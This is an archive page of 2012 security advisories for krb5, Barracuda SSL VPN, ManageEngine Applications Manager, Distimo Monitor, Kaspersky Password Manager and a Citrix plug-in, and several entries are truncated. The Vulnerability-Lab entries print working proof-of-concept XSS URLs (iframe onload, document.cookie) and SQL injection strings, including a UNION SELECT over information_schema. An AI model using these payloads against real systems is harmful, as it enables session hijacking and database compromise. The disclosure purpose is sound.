[SECURITY] [DSA 2518-1] krb5 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2518-1 secur...@debian.org http://www.debian.org/security/ Yves-Alexis Perez July 31, 2012 http://www.debian.org/security/faq - - Package: krb5 Vulnerability : denial of service and remote code execution Problem type : remote Debian-specific: no CVE ID : CVE-2012-1014 CVE-2012-1015 Debian Bug : 683429 Emmanuel Bouillon from NCI Agency discovered multiple vulnerabilities in MIT Kerberos, a daemon implementing the network authentication protocol. CVE-2012-1014 By sending specially crafted AS-REQ (Authentication Service Request) to a KDC (Key Distribution Center), an attacker could make it free an uninitialized pointer, corrupting the heap. This can lead to process crash or even arbitrary code execution. . This CVE only affects testing (wheezy) and unstable (sid) distributions. CVE-2012-1015 By sending specially crafted AS-REQ to a KDC, an attacker could make it dereference an uninitialized pointer, leading to process crash or even arbitrary code execution In both cases, arbitrary code execution is believed to be difficult to achieve, but might not be impossible. For the stable distribution (squeeze), this problem has been fixed in version 1.8.3+dfsg-4squeeze6. For the testing distribution (wheezy), this problem has been fixed in version 1.10.1+dfsg-2. For the unstable distribution (sid), this problem has been fixed in version 1.10.1+dfsg-2. We recommend that you upgrade your krb5 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBCgAGBQJQGDhVAAoJEDBVD3hx7wuohhAQAMvfn2GpJ183+cRUkU2BU0nb pNwX+RyE9PzxmROfnWQK+B5e4d/p85WVI+JIsqxRTdSU9exQW7Ix0KecFUOIDpih UapoKsfyAsq1MuHP+zzhzITrjn/N0nLAWVLmhEiGYAXsSqhF9ANtHqEAVl4LMBFs yM8mIOT1t2oBbWrdqDEObqzCHuXcF6zxOiO9V55yBima8qgKJaMfdwhexVCNgy2H s07Z/Bip1X0MOQVt39OQ8gjpxLVKjCkLIzXKnGahFcthMxbT7JUFlgkqOUEhb8hz C4aMWQ7VmaVyHRMoNQ36nbEeFOa1lbtFAUG1NtIAK4xc3yuUgzUAuiABtrlzOEE+ isTWYIFX6pAxxjmjDLXs+WzbsdbUg2WNpAT7yMlYpr8X1Fbspc4Q4cotXvOkxMDy ZiztFrxLIwRzPKqz3mAR2aMMv+C15jAAkfI8TWY44uT7Nao8r7SkghhhW9XTHq/u kjamNAqkdbeUN6Uv6LjKqtWcFHNDp/ybopx4eEAs9g49iYHjhIxeYSuZi9ezt69m 3aHE1+wRyQkYRXGTgQCSsEsQTmKG/GYsxbXz7AHTHeBKysXhozgXaVUP7mC4PhP6 IQl3TNPS7+ICDR/WmNecmDXnJSjiLr2Cxu05s6kdZufk2YuUmLKsDOwqdUK9zs5L akNPAoiNvi30U+3tc07c =lkou -END PGP SIGNATURE-
Barracuda Appliances - Validation Filter Bypass Vulnerability
Title: == Barracuda Appliances - Validation Filter Bypass Vulnerability Date: = 2012-07-16 References: === http://www.vulnerability-lab.com/get_content.php?id=661 VL-ID: = 661 Common Vulnerability Scoring System: 5.5 Abstract: = The Vulnerability Laboratory Research Team discovered a input validation filter bypass vulnerability in Barracudas Network appliance products. Report-Timeline: 2012-06-09: Researcher Notification Coordination 2012-06-10: Vendor Notification 2012-07-12: Vendor Response/Feedback 2012-07-14: Vendor Fix/Patch 2012-07-16: Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: A filter bypass vulnerability is detected in the Barracuda Networks Appliances Applications. Remote attackers with privileged user accounts bypass the application internal filter exception-handling. Successful exploitation of the vulnerability result in dbms (Server) or application (Web) compromise. Exploitation requires low or medium user inter action with privileged user account. The input filter blocks persistent input attacks with a restriction/filter exception for double quotes, ,frames, scripts statements. The vulnerability allows to bypass the existing input validation filter exception handling. The bug is located when processing to save the url path name (db stored) with attached file. The vulnerability allows to bypass the path url name parse restriction which leads to the execution on a secound vulnerable bound module which displays the input as output listing. The Account MyResource Display (example listing + input) Upload File modules are executing the earlier saved `save` path of url-path/folder which leads to the bypass of the input validation filter exception-handling. The result is the persistent execution of malicious script codes out of the security appliance application context. The vulnerability allows to bypass this method with this tricky way ... The url path function save the context of the input path name(parsed) as client side request (GET) via URL. If the request is getting bound with the file (POST), which is getting stored (persistent) displayed later on the overview listings, the code will be unauthorized executed out of the security application context(persistent|server-side). Vulnerable Module(s): [+] MyResource, File System File Upload Output/Input - Input Validation Filter Restriction Listing NOTE: The vulnerability is also located on different other security appliances on all resource listings or file uploads with url path save. Proof of Concept: = The vulnerability can be exploited by local low privileged user accounts with medium or high required user inter action. For demonstration or reproduce ... Manually ... 1. Login into for example the SSL VPN appliance 2. Switch over to the MyResources File System 3. Open via Tamper the following url ... fileSystem.do?ActionTarget=listpath=smb/random folder/ 4. Now save the path and switch to new folder 5. The setting of the path has been implemented automatic. Change the Path to your scriptcode after it has been parsed. 6. Now switch after the save to the uplaod files function. Upload any random file which is bound to the malicious title. 7. Save the file and the code is getting executed in the main index of the preview in myresources. a href=?launchId=l7e68d5startRow=0 path=smb%2F%22%3E%3C[PERSISTENT SCRIPT CODE EXECUTION!]+%3CpageSize=25sortReverse= falsesortName=fileSystem.size amp;amp;actionTarget=list class=columnHeaderSize/a /td ... or spana href=fileSystem.do?actionTarget=listlaunchId=l7e68d5path=smb/Sales%20FolderSales Folder /a / a href=fileSystem.do?actionTarget=listlaunchId=l7e68d5path=smb/Sales%20Folder/Testing%20from%20Tri%20Opt Testing from Tri Opt/a /#8203;#8203;#8203;#8203;#8203; a href=fileSystem.do?actionTarget=list launchId=l7e68d5path=smb/Sales%20Folder/ Testing%20from%20Tri%20Opt/%22%3E%3C[PERSISTENT SCRIPT CODE INJECT VIA PATH%22%29%20%3C #8203;#8203;#8203;#8203;#8203;[PERSISTENT SCRIPT CODE EXECUTION!]' = a= / /span/div Reference(s): ../video-poc.wmv Solution: = The vulnerability can be fixed by parsing the secound input request of the file upload function next to the display of the myresource listing. To fix the issue completly it is also required to parse the path url request which allows to include but not execute the context. 2012-07-14: Vendor Fix/Patch by Barracuda Networks Risk: = The security risk of the input validation filter bypass vulnerability is estimated as high(-). Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this
Barracuda SSL VPN 680 - Cross Site Scripting Vulnerabilities
Title: == Barracuda SSL VPN 680 - Cross Site Scripting Vulnerabilities Date: = 2012-07-16 References: === http://vulnerability-lab.com/get_content.php?id=561 Barracuda Networks Security ID: BNSEC-278 VL-ID: = 561 Common Vulnerability Scoring System: 3 Introduction: = The Barracuda SSL VPN is an integrated hardware and software solution enabling secure, clientless remote access to internal network resources from any Web browser. Designed for remote employees and road warriors, the Barracuda SSL VPN provides comprehensive control over file systems and Web-based applications requiring external access. The Barracuda SSL VPN integrates with third-party authentication mechanisms to control user access levels and provides single sign-on. Barracuda SSL VPN * Enables access to corporate intranets, file systems or other Web-based applications * Tracks resource access through auditing and reporting facilities * Scans uploaded files for viruses and malware * Leverages multi-factor, layered authentication mechanisms, including RSA SecurID and VASCO tokens * Integrates with existing Active Directory and LDAP directories * Utilizes policies for granular access control framework * Supports any Web browser on PC or Mac (Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/sslvpn.php) Abstract: = The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the Barracuda SSL VPN 680 appliance application. Report-Timeline: 2012-06-09: Researcher Notification Coordination 2012-06-10: Vendor Notification 2012-07-12: Vendor Response/Feedback 2012-07-14: Vendor Fix/Patch 2012-07-16: Public Disclosure Status: Published Affected Products: == Barracuda Networks Product: SSL VPN Appliance v680 - 2.2.2.115 Exploitation-Technique: === Remote Severity: = Medium Details: Multiple non persistent cross site scripting vulnerabilities are detected in Barracuda SSL VPN 680 v2.2.2.115 appliance application. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required user inter action. The bugs are located in the fileSystem.do, showUserResourceCategories.do,launchAgent.do files with the bound vulnerable policyLaunching, resourcePrefix, path return-To parameters. Successful exploitation can result in account steal, phishing client-side content request manipulation. Vulnerable Module(s): [+] showUserResourceCategories.domessageResourcesKey=resourceCategory [+] fileSystem.do?launchId=l52ca6dactionTarget=listpath= [+] launchAgent.do Vulnerable Parameter(s): [+] policyLaunching resourcePrefix [+] listpath [+] return-To Proof of Concept: = The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required user inter action. For demonstration or reproduce ... 1.1 https://sslvpn.[SERVER]/resourceList.do?form=resourceCategoriesFormreadOnly=testpath= %2FshowUserResourceCategories.domessageResourcesKey=resourceCategoryactionPath=[NON-PERSISTENT SCRIPT CODE!] 1.2 https://sslvpn.[SERVER]/[FILE].do?[VALUE #1]=l52ca6d[VALUE #2]=[VALUE #3][PATH LISTING]=smb/Sales%20Folder/Opt/[NON-PERSISTENT SCRIPT CODE!] PoC: https://sslvpn.[SERVER]/fileSystem.do?launchId=l52ca6dactionTarget=listpath=smb/Sales%20Folder/Testing %20from%20Tri%20Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C 1.3 https://sslvpn.[SERVER]/launchAgent.do?launchId=l3ce418returnTo=[NON-PERSISTENT SCRIPT CODE!] Solution: = 2012-07-14: Vendor Fix/Patch by Barracuda Networks Risk: = The security risk of the non-persistent cross site scripting vulnerabilities are estimated as medium(-). Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any
ME Application Manager 10 - Multiple Web Vulnerabilities
Title: == ME Application Manager 10 - Multiple Web Vulnerabilities Date: = 2012-07-04 References: === http://www.vulnerability-lab.com/get_content.php?id=627 VL-ID: = 627 Common Vulnerability Scoring System: 7.2 Introduction: = ManageEngine Applications Manager is a server and application performance monitoring software that helps businesses ensure high availability and performance for their business applications by ensuring servers and applications have high uptime. The application performance management capability includes server monitoring, application server monitoring, database monitoring, web services monitoring, virtualization monitoring, cloud monitoring and an array of other application management capability that will help IT administrators manage their resources effectively. (Copy of the Vendor Homepage: http://www.manageengine.com/products/applications_manager ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple Vulnerabilities in Manage Engines Application Manager v10 b10500. Report-Timeline: 2012-06-23: Public or Non-Public Disclosure Status: Published Affected Products: == Manage Engine Product: Application Manager v10.0 Exploitation-Technique: === Remote Severity: = High Details: 1.1 Multiple SQL Injection vulnerabilities are detected in Manage Engines Application Manager v10 b10500. The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands on the affected application dbms without user inter action. The vulnerabilities are located in the mypage.do or rca.jsp module(s) and the bound vulnerable parameters selectedpageid resourceid. Successful exploitation of the vulnerability results in dbms application compromise. Vulnerable Module(s): [+] MyPage.do [+] RCA.jsp Vulnerable Parameter(s): [+] selectedpageid [+] resourceid 1.2 Multiple non persistent cross site scripting vulnerabilities are detected in Manage Engines Application Manager v10 b10500. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user inter action or local low privileged user account. The vulnerabilities are located in the showCustom.do, MyPage.do, ThresholdActionConfiguration.jsp, showresource.do or ProcessTemplates.do files with the bound vulnreable parameters redirectto, type, attributeToSelect, templatetype, forpage monitorname. Successful exploitation can result in account steal, phishing client-side content request manipulation. Vulnerable Module(s): [+] showCustom.do [+] MyPage.do [+] ThresholdActionConfiguration.jsp [+] showresource.do [+] ProcessTemplates.do Vulnerable Parameter(s): [+] redirectto [+] type [+] attributeToSelect [+] templatetype [+] forpage [+] monitorname Proof of Concept: = 1.1 The blind sql injection vulnerabilities can be exploited by remote attackers without user inter action or privileged user account. For demonstration or reproduce ... PoC: http://appmanager.127.0.0.1:1338/MyPage.do?method=viewDashBoardforpage=1; addNewTab=trueselectedpageid=1017+AND+1=1--%20-[BLIND SQL-INJECTION] http://appmanager.127.0.0.1:1338/jsp/RCA.jsp?resourceid=1624attributeid=1900alertconfigurl= %2FshowActionProfiles.do%3Fmethod%3DgetResourceProfiles%26admin%3Dtrue%26all%3Dtrue%26resourceid%3D- 1624'+AND+substring(version(),1)=4[BLIND SQL-INJECTION] Sat%20Jun%2023%202012%2000:47:25%20GMT+0200%20(EET) 1.2 The non persistent cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required user inter action. For demonstration or reproduce ... http://appmanager.127.0.0.1:1338/showCustom.do?resourcename=nulltype=EC2Instanceoriginal_type=EC2Instancename=moname=i- 3a96b773tabId=1baseid=1015resourceid=1744monitorname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3Cmethod=showDataforConfs http://appmanager.127.0.0.1:1338/MyPage.do?method=viewDashBoardforpage=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL %22%29%20%3CaddNewTab=trueselectedpageid=1014 http://appmanager.127.0.0.1:1338/jsp/ThresholdActionConfiguration.jsp?resourceid=1055attributeIDs=101; attributeToSelect=101redirectto=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C http://appmanager.127.0.0.1:1338/showresource.do?resourceid=1189type=%22%3E%3Ciframe%20src=
Distimo Monitor 6.0 - Multiple Cross Site Vulnerabilities
Title: == Distimo Monitor 6.0 - Multiple Cross Site Vulnerabilities Date: = 2012-07-05 References: === http://www.vulnerability-lab.com/get_content.php?id=631 VL-ID: = 631 Common Vulnerability Scoring System: 2 Introduction: = Distimo Monitor allows developers to track their daily download and revenue figures from all app stores in one convenient place. View application rankings in all countries, and benchmark your application(s) versus the competition and the rest of the market. No code-insert in the developer application is required. Distimo provides device manufacturers, carriers and developers with the best insight into the mobile app store market, in order to and steer their app strategy. Distimo Monitor is the free cross- platform app store monitoring tool for developers. (Copy of the Vendor Homepage: http://www.distimo.com/products/ ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple Cross Site Scripting vulnerabilities in the Distimo Monitor v6.0 application. Report-Timeline: 2012-07-01: Researcher Notification Coordination 2012-07-02: Vendor Notification 2012-07-04: Vendor Response/Feedback 2012-07-05: Vendor Fix/Patch 2012-07-05: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple non persistent cross site scripting vulnerabilities are detected in the Distimo Monitor v6.0 application. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user inter action or local low privileged user account. The bugs are located in the Downloads Map or Revenue Date with the bound vulnerable parameters metric, application date. Successful exploitation can result in account steal, client side phishing client-side content request manipulation. Exploitation requires medium or high user inter action no privileged application user account. Vulnerable Module(s): [+] Downloads Map [+] Revenue Date Vulnerable Parameter(s): [+] metric [+] country [+] application Proof of Concept: = The non persistent cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required user inter action without required privileged user account. For demonstration or reproduce ... PoC: https://monitor.127.0.0.1:1338/downloads/date/metric:1/country:29/application:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/appstore:1 https://monitor.127.0.0.1:1338/downloads/date/metric:1/country:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/application:99/appstore:1 https://monitor.127.0.0.1:1338/downloads/map/metric:%3E%22%3Ciframe%20src=http://vuln-lab.com%3E+%3E%22%3Ciframe%20src=http://vuln-lab.com%3E https://monitor.127.0.0.1:1338/revenue/date/application:99/country:%3E%22%3Ciframe%20src=http://vuln-lab.com%3E%3E%22%3Ciframe%20src=http://vuln-lab.com%3E https://monitor.127.0.0.1:1338/revenue/date/application:%3E%22%3Ciframe%20src=http://vuln-lab.com%3E%3E%22%3Ciframe%20src=http://vuln-lab.com/country:30 Review: Revenue div id=savePresetPopup class=bigButton floatl style=margin: 0px 0px 0px 12px;img src=/img/add.png Save View/div /divdiv id=chartPageTabsa href=/revenue/date/application:%3E iframe= src=http:/www.vuln-lab.com iframe src=http:/www.vuln-lab.com heigh=800 width=1000/country:30 class=activeBy Date/aa href=/revenue/map/application:[NON PERSISTENT SCRIPT CODE INJECT][NON PERSISTENT SCRIPT CODE INJECT2] width=1000 heigh=800/country:30 class=By Country or Continent/a/div /div Review: Application /divdiv id=chartPageTabsa href=/downloads/date/metric:1/country:29/application: [NON PERSISTENT SCRIPT CODE INJECT]) /appstore:1 class=activeBy Date/a a href=/downloads/map/metric:1/country:29/application:[NON PERSISTENT SCRIPT CODE INJECT]) /appstore:1 class=By Country or Continent/a/div /div Review: Country div id=savePresetPopup class=bigButton floatl style=margin: 0px 0px 0px 12px;img src=/img/add.png / Save View/div /divdiv id=chartPageTabsa href=/downloads/date/metric:1/country:29/application:[NON PERSISTENT SCRIPT CODE INJECT]) /appstore: class=activeBy Date/aa href=/downloads/map/metric:1/country:29/application: [NON PERSISTENT SCRIPT CODE INJECT]) /appstore: class=By Country or Continent/a/div /div Solution: = Update to Distimo Monitor v6.1 (https://monitor.distimo.com/support/releases) Vulnerable Version(s): Distimo Monitor v6.0 Risk: = The security risk of the non persistent cross site scripting vulnerabilities are estimated as
ME Mobile Application Manager v10 - SQL Vulnerabilities
Title: == ME Mobile Application Manager v10 - SQL Vulnerabilities Date: = 2012-07-04 References: === http://www.vulnerability-lab.com/get_content.php?id=628 VL-ID: = 628 Common Vulnerability Scoring System: 8.1 Introduction: = ManageEngine Mobile Applications Manager is a server and application performance monitoring software that helps businesses ensure high availability and performance for their business applications by ensuring servers and applications have high uptime. The application performance management capability includes server monitoring, application server monitoring, database monitoring, web services monitoring, virtualization monitoring, cloud monitoring and an array of other application management capability that will help IT administrators manage their resources effectively. Note: The mobile version 10 is compatible with Blackberry, Iphone Android smartphones with IE, Safari or Firefox browser. (Copy of the Vendor Homepage: http://www.manageengine.com/products/applications_manager ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple SQL Injection Vulnerabilities in Manage Engines Mobile Application Manager v10. Report-Timeline: 2012-06-23: Public or Non-Public Disclosure Status: Published Affected Products: == Manage Engine Product: Mobile Application Manager v10.0 Exploitation-Technique: === Remote Severity: = Critical Details: Multiple SQL Injection vulnerabilities are detected in Manage Engines Mobile Application Manager v10. The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands on the affected application dbms without user inter action. The vulnerabilities are located in the DetailsView.do or Search.do module(s) and the bound vulnerable parameters showMGDetailsgroupId viewName. Successful exploitation of the vulnerabilities result in dbms application compromise via sql injection attack. Vulnerable Module(s): [+] DetailsView.do [+] Search.do Vulnerable Parameter(s): [+] showMGDetailsgroupId [+] viewName Proof of Concept: = The sql injection vulnerabilities in the mobile manager application can be exploited by remote attackers without user inter action. For demonstration or reproduce ... PoC: http://appmanager.127.0.0.1:1339/mobile/DetailsView.do?method=showMGDetailsgroupId=10003645+UnION+ SelEct+group_concat(table_NAME),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+ WHERE+table_schema=database()--%20- http://appmanager.127.0.0.1:1339/mobile/Search.do?method=mobileSearch requestid=[SQL INJECTION]mobileSearchPageviewName=Search Risk: = The security risk of the sql injection vulnerabilities are estimated as high. Credits: Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed [storm] (st...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All
Kaspersky PM 5.0.0.164 - Software Filter Vulnerability
Title: == Kaspersky PM 5.0.0.164 - Software Filter Vulnerability Date: = 2012-07-12 References: === http://www.vulnerability-lab.com/get_content.php?id=612 VL-ID: = 612 Common Vulnerability Scoring System: 3 Introduction: = Kaspersky Password Manager is an indispensable tool for the active Internet user. It fully automates the process of entering passwords and other data into websites and saves the user going to the trouble of creating and remembering multiple passwords. When you use Kaspersky Password Manager to log in, you can rest assured that your data is safe. The software creates exceptionally strong passwords and prevents your login information from being stolen. All confidential data is encrypted and kept in a dedicated database on your computer. Kaspersky Password Manager makes your web experience safer, quicker and more convenient. (Copy of the Vendor Homepage: www.kaspersky.com/us/kaspersky-password-manager ) Abstract: = The Vulnerability Laboratory Research Team discovered a software filter validation vulnerability in Kasperskys Password Manager v5.0.0.164. Report-Timeline: 2012-07-12: Public or Non-Public Disclosure Status: Published Affected Products: == Kaspersky Labs Product: Kaspersky Password Manager v5.0.0.164 older versions Exploitation-Technique: === Remote Severity: = Medium Details: A software filter validation vulnerability is detected in Kasperskys Password Manager v5.0.0.164 Software. The bug allows an attacker (local) to implement/inject malicious script code when processing to export a manipulated Kaspersky Password Manager database. The vulnerability is located in the validation of the html/xml export function/module the bound vulnerable name, domain, url, comment (listing) parameters. URLs of entries are embedded in the exported HTML file without encoding XML special characters, when the URL (domain) field of an entry contains a malicious script code, this will be executed when the exported HTML file is opened in a browser. Exploitation of the vulnerabilitiy requires a manipulated url with malicious script code, a logging server with chmod 777, a listing file (random) a kaspersky PM v5.0.0.164 user. The bug will be injected on the remote way (Autofill Engine), affects the local validation (html/xml) on exports and change the technic back when remote transfering the password lists. The injection of the malicious url/domain context can be done via automatic imports/plugins (KPM AutoFill Engine v5.0.0.164) as victim or manually (reproduce) by including. Successful exploitation of the vulnerability lead to stable (persistent) context manipulation, persistent phishing, execution of malware or stealing plain password lists. Medium user inter action is required to exploit the vulnerability. Normally Kaspersky Password Manager exports the html xml backup with a secure clean template like ... tbodytr class=``MySplitterRow``td colspan=``2`` /td/tr tr class=``MyAccountNameRow`` td align=``right`` width=``150px``Name des Benutzerkontos: /td tdbtest1/b/td /tr trtd align=``right`` valign=``top``Link: /td td valign=``top``test4/td/tr tr class=``MySplitterRowLight``td colspan=``2``/td/tr trtd align=``right`` valign=``top``Benutzername: brKennwort: /tdtd valign=``top``test2brtest3/td/tr tr class=``MySplitterRowLight``td colspan=``2``/td/tr trtd align=``right`` valign=``top``Kommentar/tdtd valign=``top``test5/td/tr tr class=``MySplitterRow``td colspan=``2`` /td/tr tr class=``MySplitterRowWhite``td colspan=``2`` /td/tr /tbody/table/body/html The local attacker manipulate the database with malicious strings (script code) in the category item profile name input fields. Kaspersky password manager generates the clean html or xml template but after the persistent script code inject in the database profile name items, the persistent code is getting execute direct out the clean exported xml or html template file. tr class=``MyAccountNameRow`` td align=``right`` width=``150px``Name des Benutzerkontos: /td tdb``iframe src=``http://vulnerability-lab.com`` onload=alert(`VL`) =`` b=``/td /tr Vulnerable Section(s): [+] Export Import - Database Categories Vulnerable Module(s): [+] HTML XML Vulnerable Parameter(s): [+] Benutzername [+] Kommentar [+] Vorname, Zweiter Vorname Nachname [+] Email, Stdt Addresse [+] Abteilung, Beruf Webseite [+] Link/Website/URL Exploitation (RemoteLocalLocalRemote) Scenario: 1. Remote Attacker is sending the victim a manipulated login page (MITM/Browser or as Link) with script
Secunia Research: Citrix Access Gateway Plug-in for Windows nsepacom ActiveX Control Integer Overflow
== Secunia Research 01/08/2012 - Citrix Access Gateway Plug-in for Windows - - nsepacom ActiveX Integer Overflow Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Citrix Access Gateway Plug-in for Windows version 9.3.49.5. NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System access Where: From remote == 3) Vendor's Description of Software Citrix Access Gateway Plug-in is client software for Windows XP and Windows Vista (32-bit) that enables secure connectivity through Access Gateway, Enterprise Edition. Product Link: http://www.citrix.com/site/ss/downloads/details.asp?downloadId= 1535878productId=15005 == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Citrix Access Gateway Plug-in for Windows, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused by an integer overflow error in the nsepacom ActiveX control (nsepa.exe) when processing HTTP responses based on the request via the StartEpa() method. This can be exploited to cause a heap-based buffer overflow via a specially crafted Content-Length HTTP response header. Successful exploitation may allow execution of arbitrary code. == 5) Solution No official solution is currently available. == 6) Time Table 19/07/2011 - Vendor notified. 21/07/2011 - Vendor response. 20/01/2012 - Requested status update. 08/02/2012 - Vendor response, fix not scheduled. 09/05/2012 - Requested status update. 09/05/2012 - Vendor response, fix scheduled for June. 03/07/2012 - Requested status update. 21/07/2012 - Vendor response, fix delayed. 01/08/2012 - Public disclosure. == 7) Credits Discovered by Dmitriy Pletnev, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2011-2593 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2012-26/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Secunia Research: Citrix Access Gateway Plug-in for Windows nsepacom ActiveX Control Buffer Overflow
== Secunia Research 01/08/2012 - Citrix Access Gateway Plug-in for Windows - - nsepacom ActiveX Buffer Overflow Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Citrix Access Gateway Plug-in for Windows version 9.3.49.5. NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System access Where: From remote == 3) Vendor's Description of Software Citrix Access Gateway Plug-in is client software for Windows XP and Windows Vista (32-bit) that enables secure connectivity through Access Gateway, Enterprise Edition. Product Link: http://www.citrix.com/site/ss/downloads/details.asp?downloadId= 1535878productId=15005 == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Citrix Access Gateway Plug-in for Windows, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused by a boundary error in the nsepacom ActiveX control (nsepa.exe) when processing HTTP responses based on the request via the StartEpa() method. This can be exploited to cause a heap-based buffer overflow via an overly long CSEC HTTP response header. Successful exploitation allows execution of arbitrary code. == 5) Solution No official solution is currently available. == 6) Time Table 19/07/2011 - Vendor notified. 21/07/2011 - Vendor response. 20/01/2012 - Requested status update. 08/02/2012 - Vendor response, fix not scheduled. 09/05/2012 - Requested status update. 09/05/2012 - Vendor response, fix scheduled for June. 03/07/2012 - Requested status update. 21/07/2012 - Vendor response, fix delayed. 01/08/2012 - Public disclosure. == 7) Credits Discovered by Dmitriy Pletnev, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2011-2592 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2012-27/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
[ MDVSA-2012:111 ] krb5
